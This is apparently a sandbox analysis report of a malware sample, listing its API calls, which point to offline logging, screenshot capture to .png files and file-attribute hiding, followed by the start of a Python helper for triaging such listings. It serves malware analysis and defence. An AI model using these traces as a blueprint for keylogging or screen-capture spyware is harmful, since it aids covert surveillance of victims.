                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00403EA9
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403EB2
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00415268,?,00415268,00415650), ref: 00403EF3
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,00415268,00415650), ref: 00403F00
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,00415268,00415650), ref: 00403F0D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00415650), ref: 00403F2D
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00415650), ref: 00403F36
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,00415268,00415650), ref: 00403F3F
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403FC9
                                • Part of subcall function 0040FC2C: free.MSVCRT(?,00401C53,?,?,00401C39,00000000,?,00401BE7,?,?,00401B82,?,00000000,?,?,00401B4A), ref: 0040FC30
                                • Part of subcall function 004021C7: closesocket.WS2_32(?), ref: 004021CC
                              • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00403FE9
                                • Part of subcall function 004021D6: closesocket.WS2_32(?), ref: 004021DB
                                • Part of subcall function 004021D6: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,00415268,00404067,?,?,?,?,?,?,?,00415268,00415650), ref: 004021E3
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,00415268,00415650), ref: 00403F17
                                • Part of subcall function 00402198: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00415A30,00415940,?,0040A446), ref: 004021A7
                                • Part of subcall function 00402198: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004021BA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00415268,00415650), ref: 0040406A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$??1?$basic_string@D@std@@@std@@$D@2@@0@Hstd@@V10@0@V?$basic_string@$??0?$basic_string@?data@?$basic_string@V12@closesocket$??0?$basic_ifstream@??2@??4?$basic_string@?c_str@?$basic_string@?close@?$basic_ifstream@?empty@?$basic_string@?is_open@?$basic_ifstream@?length@?$basic_string@?read@?$basic_istream@?seekg@?$basic_istream@?tellg@?$basic_istream@D?$basic_ifstream@D@1@@H@2@V01@V01@@V?$fpos@W4seekdir@ios_base@2@@free
                              • String ID: autofflinelogs$offlinelogs
                              • API String ID: 1118156792-1109209412
                              • Opcode ID: 34a855b8f6e84a1138228eecdb917b524b66851edd165e713db23c3f32d0fa3f
                              • Instruction ID: 7403458f184274c1abfae1a3ef7f71d8adf9ec3eca7677ca5f207d94a94b23a4
                              • Opcode Fuzzy Hash: 34a855b8f6e84a1138228eecdb917b524b66851edd165e713db23c3f32d0fa3f
                              • Instruction Fuzzy Hash: 5E8142729101099BCB15EBA0EC59AEE7B7CBF55304F0440BAF506B2091EF785F89CB59
                              APIs
                              • _EH_prolog.MSVCRT ref: 0040E15C
                              • GdiplusStartup.GDIPLUS(00415ABC,?,00000000,00000000,00000000,00000000), ref: 0040E18F
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001A), ref: 0040E1A4
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000019,00000000), ref: 0040E1B6
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040E1D3
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E1DC
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040E1E5
                              • CreateDirectoryA.KERNEL32(00000000), ref: 0040E1EC
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040E200
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040E20D
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(00000000), ref: 0040E235
                              • Sleep.KERNEL32(000003E8), ref: 0040E251
                              • _itoa.MSVCRT ref: 0040E273
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,0041181C), ref: 0040E28A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00415B08,004108CC,00000000), ref: 0040E2A2
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,00000000), ref: 0040E2B2
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,00000000), ref: 0040E2C2
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040E2CE
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E2DA
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E2E6
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E2F2
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E2FB
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,?,?,?,?,?,?,?,?,00000000), ref: 0040E30C
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(dat,?,?,?,?,?,?,?,?,00000000), ref: 0040E31F
                              • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,-00000003,?,?,?,?,?,?,?,?,00000000), ref: 0040E334
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040E342
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E34E
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E35A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040E366
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E371
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,00000000), ref: 0040E37B
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E384
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040E3A3
                                • Part of subcall function 0040DECB: ??2@YAPAXI@Z.MSVCRT ref: 0040DEEC
                                • Part of subcall function 0040DECB: mbstowcs.MSVCRT ref: 0040DEF8
                                • Part of subcall function 0040DECB: LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,00000000), ref: 0040DF1B
                                • Part of subcall function 0040DECB: GetProcAddress.KERNEL32(00000000), ref: 0040DF22
                                • Part of subcall function 0040DECB: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,00000000), ref: 0040DF30
                                • Part of subcall function 0040DECB: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,00000000), ref: 0040DF3A
                                • Part of subcall function 0040DECB: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000001B,00000000,?,00000000,00000000,00000000,?,?,?,?,00000000), ref: 0040DF84
                                • Part of subcall function 0040DECB: ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(0040E3AF,00000024,00000001,?,?,?,?,00000000), ref: 0040DFA0
                                • Part of subcall function 0040DECB: ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60(?,?,?,?,00000000), ref: 0040DFAC
                                • Part of subcall function 0040DECB: ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040DFC4
                                • Part of subcall function 0040DECB: ??2@YAPAXI@Z.MSVCRT ref: 0040DFDD
                                • Part of subcall function 0040DECB: ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000,?,?,?,?,00000000), ref: 0040DFED
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000015), ref: 0040E3C6
                              • atoi.MSVCRT ref: 0040E3CD
                              • Sleep.KERNEL32(00000000), ref: 0040E3DB
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000018,?,?,?,?,?,?,?,?,00000000), ref: 0040E3ED
                              • atoi.MSVCRT ref: 0040E3F4
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@??4?$basic_string@D@2@@0@D@std@@@std@@Hstd@@V01@V01@@V?$basic_string@$?data@?$basic_string@D@1@@V10@$??2@SleepV12@atoi$??0?$basic_ifstream@?is_open@?$basic_ifstream@?length@?$basic_string@?seekg@?$basic_istream@?size@?$basic_string@?substr@?$basic_string@?tellg@?$basic_istream@AddressCreateDirectoryGdiplusH@2@H_prologLibraryLoadProcStartupV10@0@V?$fpos@W4seekdir@ios_base@2@@_itoambstowcs
                              • String ID: .png$dat
                              • API String ID: 1729542619-928648711
                              • Opcode ID: eb964dcf7b595083339692b5b74ef4d98046628b7e17e336a57c67d4bc071420
                              • Instruction ID: 2d142cc77db60d4ea9aa91cc9091b160e98ce930e77952c3d99f5e8faa0b95a7
                              • Opcode Fuzzy Hash: eb964dcf7b595083339692b5b74ef4d98046628b7e17e336a57c67d4bc071420
                              • Instruction Fuzzy Hash: 44715271900109EBCB14ABA1EC5DAEE7B7CAB44305F00847AF506B61A1DFB85E89CB59
                              APIs
                              • Sleep.KERNEL32(00002710), ref: 00403AFC
                              • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00410668), ref: 00403B08
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00403B1D
                              • GetFileAttributesA.KERNEL32(00000000), ref: 00403B24
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000080), ref: 00403B35
                              • SetFileAttributesA.KERNEL32(00000000), ref: 00403B3C
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00403B50
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000000A,00000001), ref: 00403B61
                              • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00403B6E
                              • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00403B7A
                              • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@@Z.MSVCP60(?,?), ref: 00403B8C
                              • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403B99
                              • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403BA5
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403BB9
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00403BC6
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403BCF
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403BE3
                                • Part of subcall function 0040F44C: ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(0040E390,00000001,00000001), ref: 0040F462
                                • Part of subcall function 0040F44C: ??Bios_base@std@@QBEPAXXZ.MSVCP60(00000000), ref: 0040F487
                                • Part of subcall function 0040F44C: ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 0040F498
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000025,00000001), ref: 00403BFE
                              • ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00403C0B
                              • ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00403C17
                              • ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP60(?), ref: 00403C2E
                              • malloc.MSVCRT ref: 00403C3E
                              • ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@@Z.MSVCP60(00000000,00000000), ref: 00403C51
                              • ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH@Z.MSVCP60(00000000,00000000), ref: 00403C5F
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000,00000000), ref: 00403C86
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403C8F
                              • ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403C6B
                                • Part of subcall function 00402A2A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,?,dt@,00000000), ref: 00402A40
                                • Part of subcall function 00402A2A: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 00402A4C
                                • Part of subcall function 00402A2A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 00402A61
                                • Part of subcall function 00402A2A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402A6A
                              • ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403C9B
                              • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403CAB
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00403CB4
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403CBE
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000032,00000001,?,00000000), ref: 00403CDA
                              • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(00000000), ref: 00403CE7
                              • ?is_open@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QBE_NXZ.MSVCP60 ref: 00403CF3
                              • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00403D00
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00403D0A
                              • ?write@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV12@PBDH@Z.MSVCP60(00000000), ref: 00403D17
                              • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403D23
                              • free.MSVCRT(00000000), ref: 00403D2A
                              • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00403D37
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403D40
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403D49
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00410668), ref: 00403D59
                              • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000013), ref: 00403D6D
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000006), ref: 00403D7C
                              • SetFileAttributesA.KERNEL32(00000000), ref: 00403D83
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: U?$char_traits@$V?$allocator@$D@std@@$D@2@@std@@$D@std@@@std@@$?c_str@?$basic_string@$??1?$basic_string@$??0?$basic_string@?data@?$basic_string@?length@?$basic_string@AttributesFileV01@V01@@V12@$??0?$basic_ifstream@??0?$basic_ofstream@??4?$basic_string@?close@?$basic_ofstream@?is_open@?$basic_ofstream@D?$basic_ifstream@D?$basic_ofstream@D@1@@V?$basic_string@$??6std@@??9std@@?close@?$basic_ifstream@?is_open@?$basic_ifstream@?read@?$basic_istream@?seekg@?$basic_istream@?tellg@?$basic_istream@?write@?$basic_ostream@Bios_base@std@@D@2@@0@D@2@@0@@D@std@@@0@H@2@SleepV10@V?$basic_ostream@V?$fpos@W4seekdir@ios_base@2@@Y?$basic_string@freemalloc
                              • String ID:
                              • API String ID: 3087783639-0
                              • Opcode ID: 8af6aaee2c5f5c82285cf85a3cae82adee4e120e0fe4b5b0986eb998f2ebf055
                              • Instruction ID: e0a08072a2f7578a4e0edfff01c58fb7a8cb1c357dd6a501c8ceff23d305a88f
                              • Opcode Fuzzy Hash: 8af6aaee2c5f5c82285cf85a3cae82adee4e120e0fe4b5b0986eb998f2ebf055
                              • Instruction Fuzzy Hash: 74711A3164011A9BCB15ABA0EC9DAEE7B39AF54305F0081B9F107A61E0DFB45EC9CF58
                              APIs
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040713F
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407177
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\system32,?,WinDir), ref: 004071AE
                              • getenv.MSVCRT ref: 004071BE
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 004071C9
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004071D4
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004071E0
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071E9
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071F2
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071FB
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(\SysWOW64,?,WinDir), ref: 0040720F
                              • getenv.MSVCRT ref: 0040721F
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040722A
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00407235
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407241
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040724A
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407253
                              • getenv.MSVCRT ref: 00407271
                              • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 0040727C
                              • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000104,00000000), ref: 00407292
                              • GetLongPathNameA.KERNEL32(00000000), ref: 00407299
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 004072AB
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(004108CC,?,00000000), ref: 004072BE
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?,00000000), ref: 004072D4
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004072DF
                              • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004072EB
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004072F6
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004072FF
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407308
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407311
                              • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040731A
                              Strings
                              Memory Dump Source
                              • Source File: 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_13_2_400000_JXHPwNYzysUjKo.jbxd
                              Yara matches
                              Similarity
                              • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@1@@$??4?$basic_string@D@2@@0@Hstd@@V01@V10@0@V?$basic_string@$V01@@getenv$?c_str@?$basic_string@LongNamePath
                              • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                              • API String ID: 3803880367-1609423294
                              • Opcode ID: 66b9f45a2994cec3ad18d29cfdbe4066c6872474b4df64d1aa737fa0b3d2d247
                              • Instruction ID: 2eda70330f8664ebbc080e427488994969dc3d13a538355b743bf2b4edd7a6ea
                              • Opcode Fuzzy Hash: 66b9f45a2994cec3ad18d29cfdbe4066c6872474b4df64d1aa737fa0b3d2d247
                              • Instruction Fuzzy Hash: 68518D7290410EEBCB14DBA0EE5EDEE7778EF54305B204176F506A2090DEB86F89CB59
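The per-function listings above are dense but regular: each "APIs" block prints one bullet per call as `Name.MODULE(args), ref: ADDR`, prefixes calls attributed to callees with `Part of subcall function`, and summarises referenced literals in a `String ID` line. Read together they already tell the story (the block keyed at 0040E15C starts GDI+, creates a directory and builds a `.png` name from `_itoa`; the block at 0040713F expands `WinDir`, `AppData`, `Temp` and friends through `getenv` and `GetLongPathNameA`; routine 0040DECB pulls in subcall 0040D71E, which does `CreateDCA("DISPLAY")`, `CreateCompatibleDC` and `CreateCompatibleBitmap`, then reads a whole file with `tellg`/`seekg`/`read`). The following Python is an added triage helper written for this page, not Joe Sandbox's own code: it parses those bullet lines, collapses the MSVC-mangled C++ names to `class::member` (the operator table covers only the codes that occur here), and maps each function's API set to coarse capabilities. The capability table is the editor's heuristic, and `SAMPLE` is a constructed input made of lines copied from the listings above and trimmed.

```python
"""Triage helper for Joe Sandbox per-function "APIs" listings (added example, not report output)."""
import re

# "• Name.MODULE(args), ref: ADDR" or "• Name.MODULE ref: ADDR"; subcall lines carry a prefix.
API_RE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>[^\s(]+)\.(?P<module>[A-Za-z0-9_]+)(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$")
STRING_RE = re.compile(r"^•\s*String ID:\s*(?P<s>.*)$")

# MSVC operator / special-member codes that occur in this listing (subset of the full scheme).
OPS = {"0": "ctor", "1": "dtor", "2": "operator new", "4": "operator=", "6": "operator<<",
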